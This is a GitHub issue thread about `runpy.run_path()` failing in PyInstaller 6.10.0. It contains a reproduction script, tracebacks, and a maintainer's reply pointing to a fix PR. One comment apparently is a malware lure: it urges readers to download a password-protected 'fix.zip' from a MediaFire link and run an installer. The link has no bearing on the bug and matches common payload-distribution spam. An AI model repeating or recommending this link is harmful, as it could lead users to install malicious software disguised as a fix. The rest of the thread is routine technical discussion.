### ISSUE TITLE
`runpy.run_path()` fails in PyInstaller 6.10

### ISSUE THREAD

**Issue by SnoopJ** [pyinstaller/pyinstaller#8767]
## Description of the issue

I have a PyInstaller application that uses `runpy` to invoke other Python code that was developed to be run directly as standalone programs. I have a few use-cases where these "standalone" programs are delivered from a vendor, so it is convenient to _not_ modify these programs to interoperate with the rest of the application, but to instead invoke them directly with a swapped-out `sys.argv` and catch any `SystemExit` raised by them.

Looks like something about this workflow got broken in PyInstaller 6.10.0.

My reproduction below is given in terms of a `.py` file target, but I originally discovered this issue when targeting a `.pyc` with `runpy.run_path()`

### Context information (for bug reports)

* Output of `pyinstaller --version`: 6.10.0
* Version of Python: 3.9.6
* Platform: Ubuntu 22.04.4
* How you installed Python: `pyenv`
* Did you also try this on another platform? Does it work there? This also fails with Python 3.9.9 on Windows 10

* try the latest development version — also fails

* follow *all* the instructions in our "If Things Go Wrong" Guide
  (https://github.com/pyinstaller/pyinstaller/wiki/If-Things-Go-Wrong) and

### Make sure [everything is packaged correctly](https://github.com/pyinstaller/pyinstaller/wiki/How-to-Report-Bugs#make-sure-everything-is-packaged-correctly)

  * [x] start with clean installation
  * [x] use the latest development version
  * [x] Run your frozen program **from a command window (shell)** — instead of double-clicking on it
  * [x] Package your program in **--onedir mode**
  * [x] Package **without UPX**, say: use the option `--noupx` or set `upx=False` in your .spec-file
  * [x] Repackage you application in **verbose/debug mode**. For this, pass the option `--debug` to `pyi-makespec` or `pyinstaller` or use `EXE(..., debug=1, ...)` in your .spec file.

### A minimal example program which shows the error

With `other.py, main.py` as listed below, run:

```
$ python3 -m PyInstaller --add-data other.py:. main.py
$ ./dist/main/main
```

<details><summary>other.py</summary>

```python
import sys

print(f"Hello from other.py, args: {sys.argv}")
```

</details>

<details><summary>main.py</summary>

```python
import runpy
import sys
from pathlib import Path


HERE = Path(__file__).parent
OTHER = HERE.joinpath("other.py")


if __name__ == "__main__":
    _old_argv = sys.argv

    other_args = [
        _old_argv[0],
        "other_arg1",
        "other_arg2",
    ]

    sys.argv = other_args

    print("Running other.py")
    # NOTE: __main__ is necessary here if the target tests the value of __name__
    # this also fails with other values of run_name or if it is omitted entirely
    runpy.run_path(OTHER, run_name="__main__")

    sys.argv = _old_argv
```

</details>

### Stacktrace / full error message

PyInstaller 6.10.0:
```
$ python3 -m PyInstaller --add-data other.py:. main.py 
641 INFO: PyInstaller: 6.10.0, contrib hooks: 2024.8
645 INFO: Python: 3.9.16
653 INFO: Platform: Linux-5.15.0-113-generic-x86_64-with-glibc2.35
...
$ ./dist/main/main 
Running other.py
Traceback (most recent call last):
  File "runpy.py", line 239, in _get_main_module_details
  File "runpy.py", line 141, in _get_module_details
ImportError: No module named __main__

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "main.py", line 22, in <module>
    runpy.run_path(OTHER, run_name="runpy_main")
  File "runpy.py", line 301, in run_path
  File "runpy.py", line 242, in _get_main_module_details
ImportError: can't find '__main__' module in PosixPath('/home/snoopjedi/scratch/pyinstaller_/runpy_repro/dist/main/_internal/other.py')
[PYI-3694435:ERROR] Failed to execute script 'main' due to unhandled exception!
```

PyInstaller 6.9.0 (expected output):
```
$ python3 -m PyInstaller --add-data other.py:. main.py 
1096 INFO: PyInstaller: 6.9.0, contrib hooks: 2024.8
1100 INFO: Python: 3.9.16
1108 INFO: Platform: Linux-5.15.0-113-generic-x86_64-with-glibc2.35
...
$ ./dist/main/main 
Running other.py
Hello from other.py, args: [PosixPath('/home/snoopjedi/scratch/pyinstaller_/runpy_repro/dist/main/_internal/other.py'), 'other_arg1', 'other_arg2'] 
```

Please also see <https://github.com/pyinstaller/pyinstaller/wiki/How-to-Report-Bugs>
for more about what would use to solve the issue.

**Comment by Anubi5x0** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rokm** [comment]
According to the minimal test based off your example, this should be fixed by #8768. Can you confirm?
